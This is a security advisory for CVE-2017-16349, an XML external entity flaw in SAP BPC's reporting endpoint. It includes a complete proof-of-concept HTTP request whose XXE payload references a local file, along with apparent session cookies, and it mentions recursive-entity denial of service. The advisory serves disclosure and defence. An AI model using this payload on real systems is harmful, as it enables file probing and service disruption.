CVE-2017-16349
An exploitable XML external entity vulnerability exists in the reporting functionality of SAP BPC. A specially crafted XML request can cause an XML external entity to be referenced, resulting in information disclosure and potential denial of service. An attacker can issue authenticated HTTP requests to trigger this vulnerability.
SAP BPC
https://www.sap.com/uk/products/bpc.html
6.4 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L
CWE-611 - Improper Restriction of XML External Entity Reference
It was identified that the web application was vulnerable to an XML External Entity injection attack. While making malformed requests to most parts of the application appeared to produce error messages that indicated that XML validation was occurring, one location was identified where this was not the case:
POST /sap/bpc/systemrpt/GROUP_REPORTING1/AA HTTP/1.1
Accept: application/xml
Accept-Language: en
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
SAP-ModuleName: PC Web Client
SAP-TemplateName:
Content-Type: application/xml; charset=UTF-8
Content-Length: 541
Cookie: sap-usercontext=sap-language=EN&sap-client=500; MYSAPSSO2=AjQxMDIBABgAQQBQAFAARQBOAFQARQBTAFQARQBSADMCAAYANQAwADADABAAQQBQAEMAIAAgACAAIAAgBAAYADIAMAAxADUAMAA1ADIANwAxADUANAA4BAAAQEAACAYAAgBYCQACAEX%2fAPwwgfkGCSqGSIb3DQEHAqCB6zCB6AIVqwWWarAkGBSsOAwIaBQAwCwYJKoZIhvcNAQcBMYHIMIHFAgEBMBkwDjEMMAoGA1UEAxMDQVBDAgcgFBIiFyE4MAkGBSsOAwIaBQCgXTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcFFhZGCSqGSIb3DQEJBTEPFw0xNTA1MjcxNTQ4MTdaMCMGCSqGSIb3DQEJBDEWBBRF0JDFCj0%2fafX%2fXaDDdqeXWf57xDAJBgcqhkjOOAQDBDAwLgIVALiRIey0Km0F40INQNQ%2fZOJaa3WoAhUAlHO3IGcRMTItvoVUKQLn2ngZR9U%3d; SAP_SESSIONID_APC_500=nNh7rq2Zn-CuMr1ABb_FzlVd-NyWhI8A4QCAAAoLIYc%3d
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<!DOCTYPE AuditActivityReportFilter [<!ELEMENT AuditActivityReportFilter ANY ><!ENTITY xxe SYSTEM "file:///bin/sh" >]>
<AuditActivityReportFilter xmlns="http://xml.sap.com/2010/02/bpc">
<TimeScope>
<StartTime/>
<EndTime/>
</TimeScope>
<Paging>
<PageSize>20</PageSize>
<PageIndex>2</PageIndex>
</Paging>
<UserID/>
<ActivityFor>AppSet</ActivityFor>
<FunctionTask>&xxe;</FunctionTask>
<Source/>
<Parameter/>
<Field/>
<PreValue/>
<NewValue/>
<ReportFrom>ACTIVE</ReportFrom>
</AuditActivityReportFilter>
In this instance, two different responses were seen, which appeared to vary depending on whether the XXE entity was defined as a valid (as in this case) or invalid local file. In the event that an invalid file was referenced, an error was instead returned.
The vulnerability could also be used to trigger a CPU or memory exhaustion attack through recursively defined XML entities.
Discovered by Tim Brown of Security Advisory EMEAR